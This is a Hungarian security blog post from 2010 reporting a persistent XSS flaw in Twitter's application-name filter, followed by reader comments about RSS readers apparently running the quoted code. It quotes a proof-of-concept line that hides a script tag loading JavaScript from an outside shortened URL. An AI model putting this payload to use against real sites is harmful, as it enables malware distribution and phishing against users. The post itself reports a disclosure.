Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

Perzisztens XSS a Twitteren

2010.06.24. 15:43 | buherator | 6 komment

Egy  0wn3d_5ys becenevet használó - feltehetően indonéz - Twitter felhasználó perzisztens XSS sebezhetőséget talált a Twitteren. A problémát egy tavaly nyilvánosságra kerülthöz nagyon hasonló hiba okozza. Múlt évben James Salter a Twitter alkalmazásokhoz beállítható URL sszűrésében talált hibát, most pedig az alkalmazás nevének szűrését sikerült kijátszani. Ezen az olvalon részletesen elemzik a bemutatott PoC kódot, a leglényegesebb ez a kódrészlet:

<span>via <a href="hxxp://www.0wn3d-5ys.co.cc" rel="nofollow">Ub­­&shy;erTw­i­&shy;tter<span style="visibility: hidden"&gt; <script src='hxxp://is.gd/cWO66' type='text/javascript'&gt;</script&gt;</a> </span>

A hiba egyebek mellett lehetőséget különböző kártékony kódok terjesztésére a Twitteren keresztül, valamint megkönnyíti az adathalász támadások kivitelezését is. 

Címkék: twitter xss

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

Syr Wullam 2010.06.25. 08:59:35

Ez a poszt valamilyen kódot futtat le az RSS olvasómban (NetNewsWire, Mac OS X 10.6.4), amitől az ablak átméreteződik és össze-vissza ugrál. Van róla videóm, ha kell. ;-)

P.S. Safari 5.0 (6533.16) alatt nem tapasztalható ilyesmi.

buherator · http://buhera.blog.hu 2010.06.25. 11:51:28

@Syr Wullam: Mondanám, hogy fordulj Steve Jobshoz, de ő úgyis csak azt válaszolná, hogy ne iratkozz fel ilyen blogokra ;)

Viccet féretéve: nem tudom mi lehet a baj, FF és Chrome alatt OK minden, de már láttam olyat, hogy HTML enkódolt szöveg lefutott egy böngészőben...

gergogyerek 2010.06.25. 17:56:04

Hali, iPhone-on is ugyanez a helyzet, free RSS olvasóval megnyitva a postot feldob 2 popup-ot. lementettem. üdv g

buherator · http://buhera.blog.hu 2010.06.25. 18:14:06

Átírtam a hivatkozásokat, jobb lett? Ha igen, az elég vicces bugra utal...

Syr Wullam 2010.06.25. 22:13:55

@buherator: Jobb lett. :-))

FYI, itt a video:

mammutmail.com/?action=download&sid=817813903857ad4ee4d1fc212aa9ea54

Amúgy a bug inkább a NNW-ben lehet (mint írtam, Safari alatt nem tudtam reprodukálni), ami nem Apple termék, szóval Uncle Jobsnak hiába is szólnék.

A blogodat meg nagyra értékelem, azért olvasom. ;-)

gergogyerek 2010.06.26. 10:57:10

igen jobb lett :) köszi